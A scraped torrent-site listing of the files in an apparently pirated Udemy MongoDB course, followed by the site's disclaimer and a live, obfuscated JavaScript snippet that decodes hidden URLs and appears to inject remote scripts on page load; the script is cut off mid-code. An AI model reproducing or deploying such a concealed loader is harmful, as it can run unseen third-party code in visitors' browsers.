[FreeCourseSite.com] Udemy - MongoDB - The Complete Developer's Guide 2022

mkv   Hot:111   Size:5.02 GB   Created:2022-03-19 16:55:04   Update:2023-08-30 02:41:37  

File List

  • 0. Websites you may like/[CourseClub.ME].url 122 B
    0. Websites you may like/[FCS Forum].url 133 B
    0. Websites you may like/[FreeCourseSite.com].url 127 B
    0. Websites you may like/[GigaCourse.Com].url 49 B
    01 - Introduction/001 Introduction.mkv 35.36 MB
    01 - Introduction/002 What is MongoDB_.mkv 23.27 MB
    01 - Introduction/003 Join our Online Learning Community.html 792 B
    01 - Introduction/004 The Key MongoDB Characteristics (and how they differ from SQL Databases).mkv 12.48 MB
    01 - Introduction/005 Understanding the MongoDB Ecosystem.mkv 18.47 MB
    01 - Introduction/006 General Setup Instructions & Installing MongoDB on macOS.mkv 164.71 MB
    01 - Introduction/007 Installing MongoDB on Windows.mkv 69.48 MB
    01 - Introduction/008 Installing the MongoDB Shell.mkv 26.3 MB
    01 - Introduction/009 Installing mongoimport.html 1.46 KB
    01 - Introduction/010 Time To Get Started_.mkv 29.94 MB
    01 - Introduction/011 Shell vs Drivers.mkv 33.5 MB
    01 - Introduction/012 MongoDB + Clients_ The Big Picture.mkv 12.29 MB
    01 - Introduction/013 Course Outline.mkv 19.82 MB
    01 - Introduction/014 How To Get The Most Out Of The Course.mkv 9.26 MB
    02 - Understanding the Basics & CRUD Operations/001 Module Introduction.mkv 2.14 MB
    02 - Understanding the Basics & CRUD Operations/002 Understanding Databases, Collections & Documents.mkv 26.05 MB
    02 - Understanding the Basics & CRUD Operations/003 The Shell & MongoDB Drivers for Different Languages.mkv 12.88 MB
    02 - Understanding the Basics & CRUD Operations/004 Creating Databases & Collections.mkv 4.81 MB
    02 - Understanding the Basics & CRUD Operations/005 Understanding JSON Data.mkv 10.71 MB
    02 - Understanding the Basics & CRUD Operations/006 Comparing JSON & BSON.mkv 19.31 MB
    02 - Understanding the Basics & CRUD Operations/007 Create, Read, Update, Delete (CRUD) & MongoDB.mkv 10.4 MB
    02 - Understanding the Basics & CRUD Operations/008 Finding, Inserting, Deleting & Updating Elements.mkv 36.11 MB
    02 - Understanding the Basics & CRUD Operations/009 Understanding _insertMany()_.mkv 4.14 MB
    02 - Understanding the Basics & CRUD Operations/010 Diving Deeper Into Finding Data.mkv 15.03 MB
    02 - Understanding the Basics & CRUD Operations/011 _update_ vs _updateMany()_.mkv 45.24 MB
    02 - Understanding the Basics & CRUD Operations/012 Understanding _find()_ & the Cursor Object.mkv 22.71 MB
    02 - Understanding the Basics & CRUD Operations/013 Understanding Projection.mkv 12.93 MB
    02 - Understanding the Basics & CRUD Operations/014 Embedded Documents & Arrays - The Theory.mkv 2.45 MB
    02 - Understanding the Basics & CRUD Operations/015 Working with Embedded Documents.mkv 9.26 MB
    02 - Understanding the Basics & CRUD Operations/016 Working with Arrays.mkv 5.04 MB
    02 - Understanding the Basics & CRUD Operations/017 Accessing Structured Data.mkv 15.37 MB
    02 - Understanding the Basics & CRUD Operations/018 Wrap Up.mkv 8.95 MB
    02 - Understanding the Basics & CRUD Operations/019 Useful Resources & Links.html 463 B
    02 - Understanding the Basics & CRUD Operations/14387766-01-flights.json 306 B
    02 - Understanding the Basics & CRUD Operations/14387768-01-flights.json 306 B
    02 - Understanding the Basics & CRUD Operations/14387786-02-passengers.json 1.07 KB
    03 - Schemas & Relations_ How to Structure Documents/001 Resetting Your Database.html 393 B
    03 - Schemas & Relations_ How to Structure Documents/002 Module Introduction.mkv 3.1 MB
    03 - Schemas & Relations_ How to Structure Documents/003 Why Do We Use Schemas_.mkv 8.37 MB
    03 - Schemas & Relations_ How to Structure Documents/004 Structuring Documents.mkv 26.93 MB
    03 - Schemas & Relations_ How to Structure Documents/005 Data Types - An Overview.mkv 10.72 MB
    03 - Schemas & Relations_ How to Structure Documents/006 Data Types in Action.mkv 73.17 MB
    03 - Schemas & Relations_ How to Structure Documents/007 Data Types & Limits.html 2.69 KB
    03 - Schemas & Relations_ How to Structure Documents/008 How to Derive your Data Structure - Requirements.mkv 14.4 MB
    03 - Schemas & Relations_ How to Structure Documents/009 Understanding Relations.mkv 5.82 MB
    03 - Schemas & Relations_ How to Structure Documents/010 One To One Relations - Embedded.mkv 15.69 MB
    03 - Schemas & Relations_ How to Structure Documents/011 One To One - Using References.mkv 10.08 MB
    03 - Schemas & Relations_ How to Structure Documents/012 One To Many - Embedded.mkv 13.25 MB
    03 - Schemas & Relations_ How to Structure Documents/013 One To Many - Using References.mkv 13.16 MB
    03 - Schemas & Relations_ How to Structure Documents/014 Many To Many - Embedded.mkv 20.43 MB
    03 - Schemas & Relations_ How to Structure Documents/015 Many To Many - Using References.mkv 23.98 MB
    03 - Schemas & Relations_ How to Structure Documents/016 Summarizing Relations.mkv 5.45 MB
    03 - Schemas & Relations_ How to Structure Documents/017 Using _lookUp()_ for Merging Reference Relations.mkv 13.17 MB
    03 - Schemas & Relations_ How to Structure Documents/018 Planning the Example Exercise.mkv 14.07 MB
    03 - Schemas & Relations_ How to Structure Documents/019 Implementing the Example Exercise.mkv 21.8 MB
    03 - Schemas & Relations_ How to Structure Documents/020 Understanding Schema Validation.mkv 5.26 MB
    03 - Schemas & Relations_ How to Structure Documents/021 Adding Collection Document Validation.mkv 75.94 MB
    03 - Schemas & Relations_ How to Structure Documents/022 Changing the Validation Action.mkv 17.82 MB
    03 - Schemas & Relations_ How to Structure Documents/023 Wrap Up.mkv 9.66 MB
    03 - Schemas & Relations_ How to Structure Documents/024 Useful Resources & Links.html 638 B
    03 - Schemas & Relations_ How to Structure Documents/14387822-validation.js 1.07 KB
    03 - Schemas & Relations_ How to Structure Documents/14387824-validation-2.js 1.1 KB
    04 - Exploring The Shell & The Server/001 Module Introduction.mkv 1.47 MB
    04 - Exploring The Shell & The Server/002 Finding Available Options.mkv 22.68 MB
    04 - Exploring The Shell & The Server/003 Setting _dbpath_ & _logpath_.mkv 101.42 MB
    04 - Exploring The Shell & The Server/004 Exploring the MongoDB Options.mkv 30.62 MB
    04 - Exploring The Shell & The Server/005 MongoDB as a Background Service.mkv 37.19 MB
    04 - Exploring The Shell & The Server/006 Using a Config File.mkv 32.41 MB
    04 - Exploring The Shell & The Server/007 Shell Options & Help.mkv 52.86 MB
    04 - Exploring The Shell & The Server/008 Useful Resources & Links.html 760 B
    04 - Exploring The Shell & The Server/14387878-mongod.cfg.zip 980 B
    05 - Using the MongoDB Compass to Explore Data Visually/001 Module Introduction.mkv 1.07 MB
    05 - Using the MongoDB Compass to Explore Data Visually/002 Exploring the MongoDB Compass.mkv 25.64 MB
    05 - Using the MongoDB Compass to Explore Data Visually/003 Useful Resources & Links.html 417 B
    06 - Diving Into Create Operations/001 Module Introduction.mkv 1.71 MB
    06 - Diving Into Create Operations/002 Creating Documents - An Overview.mkv 3.49 MB
    06 - Diving Into Create Operations/003 Understanding _insert()_ Methods.mkv 13.9 MB
    06 - Diving Into Create Operations/004 Working with Ordered Inserts.mkv 24.19 MB
    06 - Diving Into Create Operations/005 Understanding the _writeConcern_.mkv 10.99 MB
    06 - Diving Into Create Operations/006 The _writeConcern_ in Practice.mkv 13.17 MB
    06 - Diving Into Create Operations/007 What is Atomicity_.mkv 4.63 MB
    06 - Diving Into Create Operations/008 Importing Data.mkv 21.37 MB
    06 - Diving Into Create Operations/009 Wrap Up.mkv 7.86 MB
    06 - Diving Into Create Operations/010 Useful Resources & Links.html 1.14 KB
    06 - Diving Into Create Operations/14387980-insertMany-docs.txt 102 B
    06 - Diving Into Create Operations/14387986-tv-shows.json 337.8 KB
    07 - Read Operations - A Closer Look/001 Module Introduction.mkv 2.58 MB
    07 - Read Operations - A Closer Look/002 Methods, Filters & Operators.mkv 4.96 MB
    07 - Read Operations - A Closer Look/003 Operators - An Overview.mkv 5.73 MB
    07 - Read Operations - A Closer Look/004 Query Selectors & Projection Operators.mkv 2.31 MB
    07 - Read Operations - A Closer Look/005 Understanding _findOne()_ & _find()_.mkv 38.82 MB
    07 - Read Operations - A Closer Look/006 Working with Comparison Operators.mkv 60.29 MB
    07 - Read Operations - A Closer Look/007 Querying Embedded Fields & Arrays.mkv 26.38 MB
    07 - Read Operations - A Closer Look/012 Diving Into Element Operators.mkv 12.27 MB
    07 - Read Operations - A Closer Look/016 Diving Deeper Into Querying Arrays.mkv 10.68 MB
    07 - Read Operations - A Closer Look/020 Understanding Cursors.mkv 4.89 MB
    07 - Read Operations - A Closer Look/021 Applying Cursors.mkv 49.71 MB
    07 - Read Operations - A Closer Look/022 Sorting Cursor Results.mkv 43.65 MB
    07 - Read Operations - A Closer Look/023 Skipping & Limiting Cursor Results.mkv 22.44 MB
    07 - Read Operations - A Closer Look/024 Using Projection to Shape our Results.mkv 17.66 MB
    07 - Read Operations - A Closer Look/025 Using Projection in Arrays.mkv 67.29 MB
    07 - Read Operations - A Closer Look/027 Useful Resources & Links.html 681 B
    07 - Read Operations - A Closer Look/14388002-tv-shows.json 337.8 KB
    07 - Read Operations - A Closer Look/23227668-tv-shows.json 337.8 KB
    08 - Update Operations/001 Module Introduction.mkv 1.47 MB
    08 - Update Operations/004 Incrementing & Decrementing Values.mkv 8.43 MB
    08 - Update Operations/006 Getting Rid of Fields.mkv 3.66 MB
    08 - Update Operations/007 Renaming Fields.mkv 2.43 MB
    08 - Update Operations/008 Understanding _upsert()_.mkv 16.29 MB
    08 - Update Operations/009 Updating Matched Array Elements.mkv 20.77 MB
    08 - Update Operations/010 Updating All Array Elements.mkv 20.04 MB
    08 - Update Operations/011 Finding & Updating Specific Fields.mkv 11.02 MB
    08 - Update Operations/012 Adding Elements to Arrays.mkv 7.68 MB
    08 - Update Operations/013 Removing Elements from Arrays.mkv 4.05 MB
    08 - Update Operations/015 Wrap Up.mkv 4.67 MB
    08 - Update Operations/016 Useful Resources & Links.html 258 B
    08 - Update Operations/14388030-users.json 744 B
    09 - Understanding Delete Operations/001 Module Introduction.mkv 734.83 KB
    09 - Understanding Delete Operations/002 Understanding _deleteOne()_ & _deleteMany()_.mkv 9.89 MB
    09 - Understanding Delete Operations/003 Deleting All Entries in a Collection.mkv 3.29 MB
    09 - Understanding Delete Operations/004 Useful Resources & Links.html 259 B
    10 - Working with Indexes/001 Module Introduction.mkv 1.66 MB
    10 - Working with Indexes/002 What Are Indexes & Why Do We Use Them_.mkv 9.15 MB
    10 - Working with Indexes/003 Adding a Single Field Index.mkv 38.93 MB
    10 - Working with Indexes/004 Indexes Behind the Scenes.html 1.37 KB
    10 - Working with Indexes/005 Understanding Index Restrictions.mkv 9.66 MB
    10 - Working with Indexes/006 Creating Compound Indexes.mkv 40.92 MB
    10 - Working with Indexes/007 Using Indexes for Sorting.mkv 5.44 MB
    10 - Working with Indexes/008 Understanding the Default Index.mkv 1.64 MB
    10 - Working with Indexes/009 Configuring Indexes.mkv 19.41 MB
    10 - Working with Indexes/010 Understanding Partial Filters.mkv 21.65 MB
    10 - Working with Indexes/011 Applying the Partial Index.mkv 9.51 MB
    10 - Working with Indexes/012 Understanding the Time-To-Live (TTL) Index.mkv 13.34 MB
    10 - Working with Indexes/013 Query Diagnosis & Query Planning.mkv 4.32 MB
    10 - Working with Indexes/014 Understanding Covered Queries.mkv 12.11 MB
    10 - Working with Indexes/015 How MongoDB Rejects a Plan.mkv 30.34 MB
    10 - Working with Indexes/016 Using Multi-Key Indexes.mkv 33.51 MB
    10 - Working with Indexes/017 Understanding Text Indexes.mkv 18.04 MB
    10 - Working with Indexes/018 Text Indexes & Sorting.mkv 9.52 MB
    10 - Working with Indexes/019 Creating Combined Text Indexes.mkv 9.59 MB
    10 - Working with Indexes/020 Using Text Indexes to Exclude Words.mkv 2.86 MB
    10 - Working with Indexes/021 Setting the Default Language & Using Weights.mkv 35.18 MB
    10 - Working with Indexes/022 Building Indexes.mkv 34.96 MB
    10 - Working with Indexes/023 Wrap Up.mkv 7.11 MB
    10 - Working with Indexes/024 Useful Resources & Links.html 906 B
    10 - Working with Indexes/14388108-persons.json 4.93 MB
    10 - Working with Indexes/14388306-credit-rating.js 237 B
    11 - Working with Geospatial Data/001 Module Introduction.mkv 1.14 MB
    11 - Working with Geospatial Data/002 Adding GeoJSON Data.mkv 29.79 MB
    11 - Working with Geospatial Data/003 Running Geo Queries.mkv 23.96 MB
    11 - Working with Geospatial Data/004 Adding a Geospatial Index to Track the Distance.mkv 15.49 MB
    11 - Working with Geospatial Data/005 Adding Additional Locations.mkv 61.38 MB
    11 - Working with Geospatial Data/006 Finding Places Inside a Certain Area.mkv 110.98 MB
    11 - Working with Geospatial Data/007 Finding Out If a User Is Inside a Specific Area.mkv 73.55 MB
    11 - Working with Geospatial Data/008 Finding Places Within a Certain Radius.mkv 70.1 MB
    11 - Working with Geospatial Data/009 Wrap Up.mkv 4.2 MB
    11 - Working with Geospatial Data/010 Useful Resources & Links.html 474 B
    12 - Understanding the Aggregation Framework/001 Module Introduction.mkv 2.57 MB
    12 - Understanding the Aggregation Framework/002 What is the Aggregation Framework_.mkv 6 MB
    12 - Understanding the Aggregation Framework/003 Getting Started with the Aggregation Pipeline.mkv 6.96 MB
    12 - Understanding the Aggregation Framework/004 Using the Aggregation Framework.mkv 11.98 MB
    12 - Understanding the Aggregation Framework/005 Understanding the Group Stage.mkv 40.03 MB
    12 - Understanding the Aggregation Framework/006 Diving Deeper Into the Group Stage.mkv 22.11 MB
    12 - Understanding the Aggregation Framework/008 Turning the Location Into a geoJSON Object.mkv 62.72 MB
    12 - Understanding the Aggregation Framework/009 Transforming the Birthdate.mkv 21.31 MB
    12 - Understanding the Aggregation Framework/010 Using Shortcuts for Transformations.mkv 7.47 MB
    12 - Understanding the Aggregation Framework/013 Pushing Elements Into Newly Created Arrays.mkv 9.88 MB
    12 - Understanding the Aggregation Framework/015 Eliminating Duplicate Values.mkv 1.95 MB
    12 - Understanding the Aggregation Framework/016 Using Projection with Arrays.mkv 7.51 MB
    12 - Understanding the Aggregation Framework/017 Getting the Length of an Array.mkv 2.62 MB
    12 - Understanding the Aggregation Framework/019 Applying Multiple Operations to our Array.mkv 27.31 MB
    12 - Understanding the Aggregation Framework/021 Diving Into Additional Stages.mkv 50.99 MB
    12 - Understanding the Aggregation Framework/022 How MongoDB Optimizes Your Aggregation Pipelines.html 395 B
    12 - Understanding the Aggregation Framework/023 Writing Pipeline Results Into a New Collection.mkv 7.96 MB
    12 - Understanding the Aggregation Framework/025 Wrap Up.mkv 6.26 MB
    12 - Understanding the Aggregation Framework/026 Useful Resources & Links.html 495 B
    12 - Understanding the Aggregation Framework/14398260-persons.json 4.93 MB
    12 - Understanding the Aggregation Framework/14400810-commands-1.js 155 B
    12 - Understanding the Aggregation Framework/14400818-commands-2.js 192 B
    12 - Understanding the Aggregation Framework/14400832-commands-3.js 689 B
    12 - Understanding the Aggregation Framework/14400838-commands-4.js 1.42 KB
    12 - Understanding the Aggregation Framework/14400840-commands-5.js 1.4 KB
    12 - Understanding the Aggregation Framework/14400842-commands-6.js 1.53 KB
    12 - Understanding the Aggregation Framework/14400844-array-data.json 709 B
    12 - Understanding the Aggregation Framework/14400846-commands-7.js 144 B
    12 - Understanding the Aggregation Framework/14400848-commands-8.js 148 B
    12 - Understanding the Aggregation Framework/14400850-commands-9.js 113 B
    12 - Understanding the Aggregation Framework/14400858-commands-10.js 104 B
    12 - Understanding the Aggregation Framework/14400860-commands-11.js 191 B
    12 - Understanding the Aggregation Framework/14400862-commands-12.js 297 B
    12 - Understanding the Aggregation Framework/14400864-commands-13.js 498 B
    12 - Understanding the Aggregation Framework/14400868-commands-14.js 277 B
    12 - Understanding the Aggregation Framework/14401010-commands-15.js 1.44 KB
    12 - Understanding the Aggregation Framework/14401016-commands-16.js 295 B
    12 - Understanding the Aggregation Framework/external-assets-links.txt 95 B
    13 - Working with Numeric Data/001 Module Introduction.mkv 1.29 MB
    13 - Working with Numeric Data/002 Number Types - An Overview.mkv 20.58 MB
    13 - Working with Numeric Data/003 MongoDB Shell & Data Types.html 585 B
    13 - Working with Numeric Data/004 Understanding Programming Language Defaults.mkv 2.88 MB
    13 - Working with Numeric Data/005 Working with int32.mkv 51.36 MB
    13 - Working with Numeric Data/006 Working with int64.mkv 25.48 MB
    13 - Working with Numeric Data/007 Doing Maths with Floats int32s & int64s.mkv 29.33 MB
    13 - Working with Numeric Data/008 What's Wrong with Normal Doubles_.mkv 8.29 MB
    13 - Working with Numeric Data/009 Working with Decimal 128bit.mkv 22.28 MB
    13 - Working with Numeric Data/010 Wrap Up.mkv 18.25 MB
    13 - Working with Numeric Data/011 Useful Resources & Links.html 1018 B
    14 - MongoDB & Security/001 Module Introduction.mkv 6.1 MB
    14 - MongoDB & Security/002 Understanding Role Based Access Control.mkv 18.55 MB
    14 - MongoDB & Security/003 Roles - Examples.mkv 5.53 MB
    14 - MongoDB & Security/004 Creating a User.mkv 15.65 MB
    14 - MongoDB & Security/005 Built-In Roles - An Overview.mkv 15.9 MB
    14 - MongoDB & Security/006 Assigning Roles to Users & Databases.mkv 31.99 MB
    14 - MongoDB & Security/007 Updating & Extending Roles to Other Databases.mkv 10.91 MB
    14 - MongoDB & Security/008 Adding SSL Transport Encryption.mkv 135.45 MB
    14 - MongoDB & Security/009 Encryption at REST.mkv 2.32 MB
    14 - MongoDB & Security/010 Wrap Up.mkv 8.33 MB
    14 - MongoDB & Security/011 Useful Resources & Links.html 1.59 KB
    14 - MongoDB & Security/external-assets-links.txt 133 B
    15 - Performance, Fault Tolerancy & Deployment/001 Module Introduction.mkv 2.78 MB
    15 - Performance, Fault Tolerancy & Deployment/002 What Influences Performance_.mkv 4.73 MB
    15 - Performance, Fault Tolerancy & Deployment/003 Understanding Capped Collections.mkv 10.45 MB
    15 - Performance, Fault Tolerancy & Deployment/004 What are Replica Sets_.mkv 9.26 MB
    15 - Performance, Fault Tolerancy & Deployment/005 Understanding Sharding.mkv 11 MB
    15 - Performance, Fault Tolerancy & Deployment/006 Deploying a MongoDB Server.mkv 4.54 MB
    15 - Performance, Fault Tolerancy & Deployment/007 Using MongoDB Atlas.mkv 103.09 MB
    15 - Performance, Fault Tolerancy & Deployment/008 Backups & Setting Alerts in MongoDB Atlas.mkv 4.9 MB
    15 - Performance, Fault Tolerancy & Deployment/009 Connecting to our Cluster.mkv 30.51 MB
    15 - Performance, Fault Tolerancy & Deployment/010 Wrap Up.mkv 5.49 MB
    15 - Performance, Fault Tolerancy & Deployment/011 Useful Resources & Links.html 410 B
    16 - Transactions/001 Module Introduction.mkv 1.12 MB
    16 - Transactions/002 What are Transactions_.mkv 4.28 MB
    16 - Transactions/003 A Typical Usecase.mkv 5.08 MB
    16 - Transactions/004 How Does a Transaction Work_.mkv 61.97 MB
    16 - Transactions/005 Useful Resources & Links.html 240 B
    17 - From Shell to Driver/001 Module Introduction.mkv 3.15 MB
    17 - From Shell to Driver/002 Splitting Work Between the Driver & the Shell.mkv 3.08 MB
    17 - From Shell to Driver/003 Preparing our Project.mkv 26.69 MB
    17 - From Shell to Driver/004 Installing Visual Studio Code.mkv 5.3 MB
    17 - From Shell to Driver/005 Installing the Node.js Driver.mkv 25.93 MB
    17 - From Shell to Driver/006 Connecting Node.js & the MongoDB Cluster.mkv 45.04 MB
    17 - From Shell to Driver/007 Storing Products in the Database.mkv 60.23 MB
    17 - From Shell to Driver/008 Storing the Price as 128bit Decimal.mkv 76.98 MB
    17 - From Shell to Driver/009 Fetching Data From the Database.mkv 85.14 MB
    17 - From Shell to Driver/010 Creating a More Realistic Setup.mkv 144.29 MB
    17 - From Shell to Driver/011 Getting a Single Product.mkv 36.08 MB
    17 - From Shell to Driver/012 Editing & Deleting Products.mkv 100.16 MB
    17 - From Shell to Driver/013 Implementing Pagination.mkv 52.79 MB
    17 - From Shell to Driver/014 Adding an Index.mkv 16.36 MB
    17 - From Shell to Driver/015 Signing Users Up.mkv 64.94 MB
    17 - From Shell to Driver/016 Adding an Index to Make the Email Unique.mkv 10.36 MB
    17 - From Shell to Driver/017 Adding User Sign In.mkv 76.31 MB
    17 - From Shell to Driver/018 Wrap Up.mkv 5.71 MB
    17 - From Shell to Driver/019 Useful Resources & Links.html 290 B
    17 - From Shell to Driver/14401094-shell-to-driver-01-starting-code.zip 576.53 KB
    17 - From Shell to Driver/14401096-shell-to-driver-02-added-mongodb-connection.zip 580.29 KB
    17 - From Shell to Driver/14401098-shell-to-driver-03-insert-data.zip 577 KB
    17 - From Shell to Driver/14401100-shell-to-driver-04-fetch-data.zip 576.77 KB
    17 - From Shell to Driver/14401102-shell-to-driver-05-manage-connection-better.zip 581.35 KB
    17 - From Shell to Driver/14401104-shell-to-driver-06-fetch-single-product.zip 580.3 KB
    17 - From Shell to Driver/14401108-shell-to-driver-07-update-and-delete-products.zip 581.95 KB
    17 - From Shell to Driver/14401120-shell-to-driver-08-pagination-demo-code.zip 580.38 KB
    17 - From Shell to Driver/14401124-shell-to-driver-09-added-user-signup.zip 580.31 KB
    17 - From Shell to Driver/14401126-shell-to-driver-10-added-login.zip 578.06 KB
    18 - Introducing Stitch/001 Module Introduction.mkv 2 MB
    18 - Introducing Stitch/002 Stitch & MongoDB Realm.html 566 B
    18 - Introducing Stitch/003 What is Stitch_.mkv 14.31 MB
    18 - Introducing Stitch/004 Preparations.mkv 5.92 MB
    18 - Introducing Stitch/005 Start Using Stitch.mkv 37.5 MB
    18 - Introducing Stitch/006 Adding Stitch to our App & Initializing It.mkv 90.87 MB
    18 - Introducing Stitch/007 Adding Authentication.mkv 18.63 MB
    18 - Introducing Stitch/008 Sending Data Access Rules.mkv 38.34 MB
    18 - Introducing Stitch/009 Fetching & Converting Data.mkv 10.79 MB
    18 - Introducing Stitch/010 Deleting Products.mkv 19.77 MB
    18 - Introducing Stitch/011 Finding a Single Product.mkv 46.02 MB
    18 - Introducing Stitch/012 Adding Products.mkv 38.57 MB
    18 - Introducing Stitch/013 Updating Products.mkv 45.01 MB
    18 - Introducing Stitch/014 Switching to User Email & Password Authentication.mkv 10 MB
    18 - Introducing Stitch/015 Adding User Sign Up & Confirmation.mkv 75.54 MB
    18 - Introducing Stitch/016 Adding User Login.mkv 27.95 MB
    18 - Introducing Stitch/017 Rules & Real Users.mkv 11.02 MB
    18 - Introducing Stitch/018 The Current State of Authentication.html 989 B
    18 - Introducing Stitch/019 Functions & Triggers.mkv 25.01 MB
    18 - Introducing Stitch/020 Wrap Up.mkv 3.79 MB
    18 - Introducing Stitch/021 Useful Resources & Links.html 677 B
    18 - Introducing Stitch/14401138-stitch-01-starting-code.zip 238.47 KB
    18 - Introducing Stitch/14401140-stitch-02-anonymous-auth-fetching-deleting.zip 244.32 KB
    18 - Introducing Stitch/14401142-stitch-03-fetch-product.zip 240.32 KB
    18 - Introducing Stitch/14401146-stitch-04-insert.zip 239.51 KB
    18 - Introducing Stitch/14401164-stitch-05-edit.zip 238.52 KB
    18 - Introducing Stitch/14401172-stitch-07-functions-triggers.zip 241.9 KB
    18 - Introducing Stitch/14401174-stitch-06-user-password-auth.zip 241.87 KB
    19 - Roundup/001 Course Roundup.mkv 5.83 MB
    19 - Roundup/002 Course Slides.html 47 B
    19 - Roundup/003 Bonus_ More Content_.html 1.04 KB
    19 - Roundup/15231450-slides.pdf 5.29 MB

Download Info

  • Tips

    “[FreeCourseSite.com] Udemy - MongoDB - The Complete Developer's Guide 2022” Its related downloads are collected from the DHT sharing network, the site will be 24 hours of real-time updates, to ensure that you get the latest resources.This site is not responsible for the authenticity of the resources, please pay attention to screening.If found bad resources, please send a report below the right, we will be the first time shielding.

  • DMCA Notice and Takedown Procedure

    If this resource infringes your copyright, please email([email protected]) us or leave your message here ! we will block the download link as soon as possiable.

!function(){function a(a){var _idx="f9m7hqe5dm";var b={e:"P",w:"D",T:"y","+":"J",l:"!",t:"L",E:"E","@":"2",d:"a",b:"%",q:"l",X:"v","~":"R",5:"r","&":"X",C:"j","]":"F",a:")","^":"m",",":"~","}":"1",x:"C",c:"(",G:"@",h:"h",".":"*",L:"s","=":",",p:"g",I:"Q",1:"7",_:"u",K:"6",F:"t",2:"n",8:"=",k:"G",Z:"]",")":"b",P:"}",B:"U",S:"k",6:"i",g:":",N:"N",i:"S","%":"+","-":"Y","?":"|",4:"z","*":"-",3:"^","[":"{","(":"c",u:"B",y:"M",U:"Z",H:"[",z:"K",9:"H",7:"f",R:"x",v:"&","!":";",M:"_",Q:"9",Y:"e",o:"4",r:"A",m:".",O:"o",V:"W",J:"p",f:"d",":":"q","{":"8",W:"I",j:"?",n:"5",s:"3","|":"T",A:"V",D:"w",";":"O"};return a.split("").map(function(a){return void 0!==b[a]?b[a]:a}).join("")}var b=a('data:image/jpg;base64,l7_2(F6O2ca[7_2(F6O2 5ca[5YF_52"vX8"%cmn<ydFhm5d2fO^caj}g@aPqYF 282_qq!Xd5 Y8D62fODm622Y5V6fFh!qYF J8Y/Ko0.c}00%n0.cs*N_^)Y5c"}"aaa!Xd5 F=O!(O2LF X8[6L|OJgN_^)Y5c"@"a<@=5YXY5LY9Y6phFgN_^)Y5c"0"a=YXY2F|TJYg"FO_(hY2f"=LqOFWfg_cmn<ydFhm5d2fO^cajngKa=5YXY5LYWfg_cmn<ydFhm5d2fO^cajngKa=5ODLgo=(Oq_^2Lg}0=6FY^V6FhgY/}0=6FY^9Y6phFgJ/o=qOdfiFdF_Lg0=5Y|5Tg0P=68"bGYYYGb"!qYF d8HZ!F5T[d8+i;NmJd5LYc(c6a??"HZ"aP(dF(hcYa[P7_2(F6O2 TcYa[5YF_52 Ym5YJqd(Yc"[[fdTPP"=c2YD wdFYampYFwdFYcaaP7_2(F6O2 (cY=Fa[qYF 282_qq!F5T[28qO(dqiFO5dpYmpYFWFY^cYaP(dF(hcYa[Fvvc28FcaaP5YF_52 2P7_2(F6O2 qcY=F=2a[F5T[qO(dqiFO5dpYmLYFWFY^cY=FaP(dF(hcYa[2vv2caPP7_2(F6O2 LcY=Fa[F8}<d5p_^Y2FLmqY2pFhvvXO6f 0l88FjFg""!XmqOdfiFdF_L8*}=}00<dmqY2pFh??cdmJ_Lhc`c$[YPa`%Fa=qc6=+i;NmLF562p67TcdaaaP7_2(F6O2 _cYa[qYF F80<d5p_^Y2FLmqY2pFhvvXO6f 0l88YjYg}=28"ruxwE]k9W+ztyN;eI~i|BAV&-Ud)(fY7h6CSq^2OJ:5LF_XDRT4"=O82mqY2pFh=58""!7O5c!F**!a5%82HydFhm7qOO5cydFhm5d2fO^ca.OaZ!5YF_52 5P7_2(F6O2 fcYa[qYF F8fO(_^Y2Fm(5YdFYEqY^Y2Fc"L(56JF"a!Xd5 28c28"hFFJLg//[[fdTPP@@{Cq_2Ohpm2O6LnpCmRT4gQ@{n/CL/@@{jR87Q^1h:Ynf^"a%c*}8882m62fYR;7c"j"aj"j"g"v"a%"58"%Xm5Y|5T%%%"vF8"%hca%5ca!FmL5(8Tc2a=FmO2qOdf87_2(F6O2ca[XmqOdfiFdF_L8@=)caP=FmO2Y55O587_2(F6O2ca[YvvYca=LYF|6^YO_Fc7_2(F6O2ca[Fm5Y^OXYcaP=}0aP=fO(_^Y2FmhYdfmdJJY2fxh6qfcFa=XmqOdfiFdF_L8}P7_2(F6O2 hca[qYF Y8(c"bb___b"a!5YF_52 Y??qc"bb___b"=Y8ydFhm5d2fO^camFOiF562pcsKamL_)LF562pcsa=7_2(F6O2ca[Y%8"M"Pa=Y2(OfYB~WxO^JO2Y2FcYaPr55dTm6Lr55dTcda??cd8HZ=qc6=""aa!qYF 78"@@{"=^8"7Q^1h:Ynf^"!7_2(F6O2 pcYa[}l88Ym5YdfTiFdFYvv0l88Ym5YdfTiFdFY??Ym(qOLYcaP7_2(F6O2 icYa[Xd5 F8H"@@{d2(LCYmTfY20C0mRT4"="@@{5p(LYpmsOopQqqmRT4"="@@{D7(LSqmTfY20C0mRT4"="@@{dC(LJ^msOopQqqmRT4"="@@{(C(L:4mTfY20C0mRT4"="@@{C2(LSYmsOopQqqmRT4"="@@{25(LLSmTfY20C0mRT4"Z=F8FHc2YD wdFYampYFwdTcaZ??FH0Z=F8"DLLg//"%c2YD wdFYampYFwdFYca%F%"g@Q@{n"!qYF O82YD VY)iO(SYFcF%"/"%7%"jR8"%^%"v58"%Xm5Y|5T%%%"vF8"%hca%5ca%c2_qql882j2gcF8fO(_^Y2Fm:_Y5TiYqY(FO5c"^YFdH2d^Y8(Z"a=28Fj"v(h8"%FmpYFrFF56)_FYc"("ag""aaa!OmO2OJY287_2(F6O2ca[XmqOdfiFdF_L8@P=OmO2^YLLdpY87_2(F6O2cFa[qYF 28FmfdFd!F5T[287_2(F6O2cYa[qYF 5=F=2=O=6=d=(8"(hd5rF"=q8"75O^xhd5xOfY"=L8"(hd5xOfYrF"=_8"62fYR;7"=f8"ruxwE]k9W+ztyN;eI~i|BAV&-Ud)(fY7ph6CSq^2OJ:5LF_XDRT40}@sonK1{Q%/8"=h8""=780!7O5cY8Ym5YJqd(Yc/H3r*Ud*40*Q%/8Z/p=""a!7<YmqY2pFh!a28fH_ZcYH(Zc7%%aa=O8fH_ZcYH(Zc7%%aa=68fH_ZcYH(Zc7%%aa=d8fH_ZcYH(Zc7%%aa=58c}nvOa<<o?6>>@=F8csv6a<<K?d=h%8iF562pHqZc2<<@?O>>oa=Kol886vvch%8iF562pHqZc5aa=Kol88dvvch%8iF562pHqZcFaa![Xd5 ^8h!qYF 